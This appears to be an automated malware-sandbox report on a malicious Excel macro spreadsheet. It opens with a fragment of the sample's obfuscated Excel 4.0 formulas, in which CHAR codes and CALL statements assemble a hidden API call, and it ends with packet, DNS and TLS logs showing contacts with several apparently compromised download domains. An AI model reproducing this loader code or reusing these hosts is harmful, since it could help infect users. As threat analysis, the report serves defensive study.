,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(85),,,,=CHAR(74),,=CHAR(114),,=CHAR(44),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(82),,,,=CHAR(74),,=CHAR(117),,=CHAR(68),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(76),,,,=CHAR(67),,=CHAR(110),,=CHAR(108),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(77),,,,=CHAR(67),,=CHAR(100),,=CHAR(108),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)",,,,,,=CHAR(111),,,,=CHAR(66),,=CHAR(108),,=CHAR(82),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(110),,,,=CHAR(66),,=CHAR(108),,=CHAR(101),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(51),,=CHAR(103),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(105),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(115),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR(116),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=CALL(""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&'""''  ds                       ''d'!AL5&'""''  ds                       ''d'!AL6&'""''  ds                       ''d'!AL7&'""''  ds                       ''d'!AL8&'""''  ds                       ''d'!AL9&'""''  ds                       ''d'!AL10&'""''  ds                       ''d'!AL11&'""''  ds                       ''d'!AL12&'""''  ds                       ''d'!AL13&'""''  ds                       ''d'!AL14&'""''  ds                       ''d'!AL15&'""''  ds                       ''d'!AL16&'""''  ds                       ''d'!AL17&'""''  ds                       ''d'!AL18&'DiNDoie    ""`block`'' target  - '!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.0.sheet!BU32&'""''  ds                       ''d'!A100&'DiNDoie    ""`block`'' target  - '!A200&'DiNDoie    ""`block`'' target  - '!C200,'DiNDoie    ""`block`'' target  - '!E201,0,0)",,,,,,,,,,,,,,=CHAR(101),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&'""''  ds                       ''d'!AL5&'""''  ds                       ''d'!AL6&'""''  ds                       ''d'!AL7&'""''  ds            

                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Apr 6, 2021 18:43:12.412442923 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:12.567662001 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:12.568250895 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:12.570360899 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:12.725892067 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:12.727833033 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:12.727865934 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:12.727880955 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:12.731722116 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:12.745721102 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:12.901671886 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:12.901910067 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:12.902971983 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:13.099565983 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.369064093 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.369175911 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.369189024 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:13.369251966 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:13.371452093 CEST49714443192.168.2.3108.167.180.111
                                                                                                                                                                                    Apr 6, 2021 18:43:13.526624918 CEST44349714108.167.180.111192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.618545055 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:13.669312954 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.669414043 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:13.669982910 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:13.720793009 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.728467941 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.728514910 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.728542089 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.728573084 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:13.728617907 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:13.728631020 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:13.736701965 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:13.788091898 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.788275957 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:13.789377928 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:13.884279013 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.370043039 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.370075941 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.370088100 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.370104074 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.370124102 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.370141983 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.370155096 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.370297909 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.370333910 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492253065 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492281914 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492300987 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492317915 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492333889 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492350101 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492362976 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492367983 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492377996 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492397070 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492412090 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492417097 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492430925 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492433071 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492449045 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492454052 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492465973 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492477894 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492479086 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492496014 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492511988 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.492527962 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.505930901 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.505956888 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.505970001 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.506160021 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.542958975 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.542988062 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.542999983 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543010950 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543114901 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543148041 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543278933 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543297052 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543312073 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543322086 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543328047 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543344975 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543346882 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543359041 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543359995 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543390989 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.543415070 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.622772932 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.622807980 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.622826099 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.622842073 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.622859001 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.622875929 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.622890949 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.622911930 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.622966051 CEST49716443192.168.2.35.100.152.162
                                                                                                                                                                                    Apr 6, 2021 18:43:14.635014057 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.635046005 CEST443497165.100.152.162192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.635059118 CEST443497165.100.152.162192.168.2.3

                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Apr 6, 2021 18:42:51.702176094 CEST5128153192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:42:51.775135040 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:42:51.879831076 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:42:51.928610086 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:42:52.665086031 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:42:52.711976051 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:42:54.125261068 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:42:54.174099922 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:42:54.921010017 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:42:54.968219042 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:42:55.834630966 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:42:55.883558035 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:42:56.983181000 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:42:57.032025099 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:42:57.884557009 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:42:57.930491924 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:02.982445002 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:03.028435946 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:07.102267027 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:07.156682968 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:07.877885103 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:07.923810959 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:08.475853920 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:08.535820007 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:09.019254923 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:09.094820023 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:09.890789986 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:09.940320969 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:10.031987906 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:10.102806091 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:11.043410063 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:11.119330883 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:12.231065989 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:12.410356045 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:12.492549896 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:12.541306019 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.053577900 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:13.108077049 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:13.452708006 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:13.529921055 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:14.746299982 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:14.804827929 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:17.053597927 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:17.089443922 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:17.121547937 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:17.197707891 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:17.682018995 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:17.736532927 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:26.118623972 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:26.170742035 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:30.053122997 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:30.115180969 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:30.996336937 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:31.042685986 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:32.116446018 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:32.165416956 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:34.361793041 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:34.416579962 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:35.459012032 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:35.504947901 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:36.377782106 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:36.424268007 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:38.334639072 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:38.382106066 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:42.701493025 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:42.757889032 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:48.942265034 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:49.012682915 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:43:59.788446903 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:43:59.857137918 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:44:05.710839987 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:44:05.770268917 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:44:37.330336094 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:44:37.376353025 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                                    Apr 6, 2021 18:44:39.000998974 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                                    Apr 6, 2021 18:44:39.070346117 CEST53636198.8.8.8192.168.2.3

                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                    Apr 6, 2021 18:43:12.231065989 CEST192.168.2.38.8.8.80x4d42Standard query (0)ethereality.infoA (IP address)IN (0x0001)
                                                                                                                                                                                    Apr 6, 2021 18:43:13.452708006 CEST192.168.2.38.8.8.80xd72eStandard query (0)thefamouscurrybazaar.co.ukA (IP address)IN (0x0001)
                                                                                                                                                                                    Apr 6, 2021 18:43:14.746299982 CEST192.168.2.38.8.8.80xf98bStandard query (0)devrongolf.comA (IP address)IN (0x0001)
                                                                                                                                                                                    Apr 6, 2021 18:43:17.089443922 CEST192.168.2.38.8.8.80xad97Standard query (0)ponchokhana.comA (IP address)IN (0x0001)
                                                                                                                                                                                    Apr 6, 2021 18:43:17.682018995 CEST192.168.2.38.8.8.80xf3a0Standard query (0)springbedspetroleum.comA (IP address)IN (0x0001)

                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                    Apr 6, 2021 18:43:12.410356045 CEST8.8.8.8192.168.2.30x4d42No error (0)ethereality.info108.167.180.111A (IP address)IN (0x0001)
                                                                                                                                                                                    Apr 6, 2021 18:43:13.529921055 CEST8.8.8.8192.168.2.30xd72eNo error (0)thefamouscurrybazaar.co.uk5.100.152.162A (IP address)IN (0x0001)
                                                                                                                                                                                    Apr 6, 2021 18:43:14.804827929 CEST8.8.8.8192.168.2.30xf98bNo error (0)devrongolf.com43.229.135.209A (IP address)IN (0x0001)
                                                                                                                                                                                    Apr 6, 2021 18:43:17.197707891 CEST8.8.8.8192.168.2.30xad97No error (0)ponchokhana.com5.100.155.169A (IP address)IN (0x0001)
                                                                                                                                                                                    Apr 6, 2021 18:43:17.736532927 CEST8.8.8.8192.168.2.30xf3a0No error (0)springbedspetroleum.com50.116.95.68A (IP address)IN (0x0001)

                                                                                                                                                                                    HTTPS Packets

                                                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                    Apr 6, 2021 18:43:12.727880955 CEST108.167.180.111443192.168.2.349714CN=webmail.ethereality.info CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 14:03:59 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 15:03:59 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                    Apr 6, 2021 18:43:13.728542089 CEST5.100.152.162443192.168.2.349716CN=www.thefamouscurrybazaar.co.uk CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 18 22:33:38 CET 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 16 23:33:38 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                    Apr 6, 2021 18:43:15.318989992 CEST43.229.135.209443192.168.2.349717CN=devrongolf.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Mar 20 17:11:48 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri Jun 18 18:11:48 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
